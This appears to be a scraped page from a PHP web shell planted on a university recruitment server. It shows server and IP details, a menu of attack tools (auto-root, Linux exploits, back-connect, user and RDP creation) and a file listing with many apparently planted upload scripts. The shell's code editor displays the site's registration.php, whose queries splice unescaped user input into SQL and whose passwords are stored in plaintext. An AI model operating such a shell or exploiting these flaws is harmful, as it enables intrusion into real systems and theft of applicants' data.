Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64
Apache
: 172.26.7.228 | : 3.141.12.236
Cant Read [ /etc/named.conf ]
5.6.40-24+ubuntu18.04.1+deb.sury.org+1
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
orms-gug /
[ HOME SHELL ]
Name
Size
Permission
Action
admin
[ DIR ]
drwxr-xr-x
admin_22
[ DIR ]
drwxr-xr-x
css
[ DIR ]
drwxr-xr-x
default
[ DIR ]
drwxr-xr-x
docs
[ DIR ]
drwxr-xr-x
html_modules
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
libs
[ DIR ]
drwxr-xr-x
src
[ DIR ]
drwxr-xr-x
tcpdf
[ DIR ]
drwxr-xr-x
tcpdf_old
[ DIR ]
drwxr-xr-x
uploads
[ DIR ]
drwxrwxrwx
5501_DUBA1_DUBA155010100.jpg
14.52
KB
-rwxr-xr-x
5501_DUBA1_DUBA155010100_sign....
10.34
KB
-rwxr-xr-x
app.php
416
B
-rwxr-xr-x
cManualMailer.php
1.38
KB
-rwxr-xr-x
cconfig.php
1.45
KB
-rwxr-xr-x
cconfig2.php
741
B
-rwxr-xr-x
home-copy.html
68.5
KB
-rwxr-xr-x
home.html
8.68
KB
-rwxr-xr-x
home.js
27.29
KB
-rwxr-xr-x
home_25102017.html
5.01
KB
-rwxr-xr-x
home_30082017.html
61.38
KB
-rwxr-xr-x
home__arun.html
63.56
KB
-rwxr-xr-x
index.html
6.55
KB
-rwxr-xr-x
index_16092017.html
5.55
KB
-rwxr-xr-x
index_old.html
5.66
KB
-rwxr-xr-x
main_page.html
5.84
KB
-rwxr-xr-x
main_page_09092017_befirechang...
5.32
KB
-rwxr-xr-x
payment_gate_way_responce.php
5.87
KB
-rwxr-xr-x
payment_gateway.php
8.43
KB
-rwxr-xr-x
phpinfo.php
25
B
-rwxr-xr-x
registration.html
2.65
KB
-rwxr-xr-x
registration.php
3.78
KB
-rwxr-xr-x
script.js
1.02
KB
-rwxr-xr-x
style.css
3.2
KB
-rwxr-xr-x
upload_file.php
604
B
-rwxr-xr-x
upload_file10.php
604
B
-rwxr-xr-x
upload_file11.php
604
B
-rwxr-xr-x
upload_file12.php
604
B
-rwxr-xr-x
upload_file13.php
604
B
-rwxr-xr-x
upload_file14.php
604
B
-rwxr-xr-x
upload_file15.php
604
B
-rwxr-xr-x
upload_file16.php
604
B
-rwxr-xr-x
upload_file17.php
604
B
-rwxr-xr-x
upload_file18.php
604
B
-rwxr-xr-x
upload_file19.php
604
B
-rwxr-xr-x
upload_file2.php
609
B
-rwxr-xr-x
upload_file20.php
604
B
-rwxr-xr-x
upload_file21.php
604
B
-rwxr-xr-x
upload_file22.php
604
B
-rwxr-xr-x
upload_file23.php
604
B
-rwxr-xr-x
upload_file24.php
604
B
-rwxr-xr-x
upload_file25.php
604
B
-rwxr-xr-x
upload_file3.php
604
B
-rwxr-xr-x
upload_file4.php
604
B
-rwxr-xr-x
upload_file5.php
604
B
-rwxr-xr-x
upload_file6.php
604
B
-rwxr-xr-x
upload_file7.php
604
B
-rwxr-xr-x
upload_file8.php
604
B
-rwxr-xr-x
upload_file9.php
604
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : registration.php
<?php function newregistration($aobj_context) { $aobj_context->mobj_db->SetFetchMode(ADODB_FETCH_ASSOC); session_start(); $username = trim($aobj_context->mobj_data["username"]); $emailid = trim($aobj_context->mobj_data["emailid"]); $mobileno =trim($aobj_context->mobj_data["mobileno"]); //FNOTIFICATION $query1 = "select * from masuser where femail = '{$emailid}'"; $rst1 = $aobj_context->mobj_db->GetRow($query1); if($rst1) { $err_data = "Account already exists with this email address. Check your registered email for the password. In case password is not received, use Forgot Password option to get new password"; echo $aobj_context->mobj_output->ToJSONEnvelope($err_data,-1,"Failure"); return false; } $num = $mobileno; $otpaswrd = generateRandomString(); $query = "insert into masuser(fusername, fmobile, femail, fpassword,fregdate) values('{$username}','{$num}','{$emailid}','{$otpaswrd}',now())"; $rst2 = $aobj_context->mobj_db->Execute($query); SendMailOtPToUser($emailid,$otpaswrd); if($rst2) { $suc_data = "Registered Successfully. Use the Password sent to the registered Email id. / Mobile No. For login"; echo $aobj_context->mobj_output->ToJSONEnvelope($suc_data,0,"Success"); return; } else { $err_data = "Some error as occured"; echo $aobj_context->mobj_output->ToJSONEnvelope($err_data,0,"Success"); return false; } } function sendpassword($aobj_context) { $aobj_context->mobj_db->SetFetchMode(ADODB_FETCH_ASSOC); $emailid = trim($aobj_context->mobj_data["emailid"]); $query1 = "select m.* from masuser m where femail = '{$emailid}'"; $rst1 = $aobj_context->mobj_db->GetRow($query1); //var_dump($query1); $otpaswrd = generateRandomString(); if($rst1) { $query = "update masuser set fpassword = '{$otpaswrd}',floginsmsstatus = null where femail = '{$emailid}'"; $rst2 = $aobj_context->mobj_db->Execute($query); SendMailOtPToUser($emailid,$otpaswrd); if($rst2) { $suc_data = "Use the Password sent to the registered Email id. / Mobile No. for Login"; echo $aobj_context->mobj_output->ToJSONEnvelope($suc_data,0,"Success"); return; } else { $err_data = "Some error as occured"; echo $aobj_context->mobj_output->ToJSONEnvelope($err_data,0,"Success"); return false; } } else { $err_data = "Account does not exists with this email address.Please Use New Registration."; echo $aobj_context->mobj_output->ToJSONEnvelope($err_data,-1,"Failure"); return false; } //$otpaswrd = generateRandomString(); } function SendMailOtPToUser($emailid,$otpaswrd) { require_once("cManualMailer.php"); $message="<html>"; $message.="<body>"; $message.="<style>"; $message.=".mail_tbl td{text-align:left; padding:2px; font-size:12px; font-family: Verdana, Arial, Helvetica, sans-serif;}"; $message.="</style>"; $message.="<p style='font-size:12px; font-family: Verdana, Arial, Helvetica, sans-serif'>Dear Candidate,</p></br>"; $message.="<p style='font-size:12px; font-family: Verdana, Arial, Helvetica, sans-serif'>Greetings from Central University of Karnataka,</p></br>"; $message.="<p style='font-size:12px; font-family: Verdana, Arial, Helvetica, sans-serif'>Your registration is Done successfully for the notification {$advno}. Continue with application entry using the registered id and password given below.</p></br>"; $message.="<p style='font-size:12px; font-family: Verdana, Arial, Helvetica, sans-serif'> Login Password : {$otpaswrd}</p>"; $message.="</br>"; $message.="</body>"; $message.="</html>"; $subject="CUKUNI - CUK Notification(Confirm your Registration)"; $data='true'; $data = send_manual_mail($emailid,$subject,$message,$replay_to=null,$cc=null,'techsupport@logisys.net.in'); } function generateRandomString($length = 8) { return strtoupper(substr(sha1(rand()), 0, $length)); } ?>
Close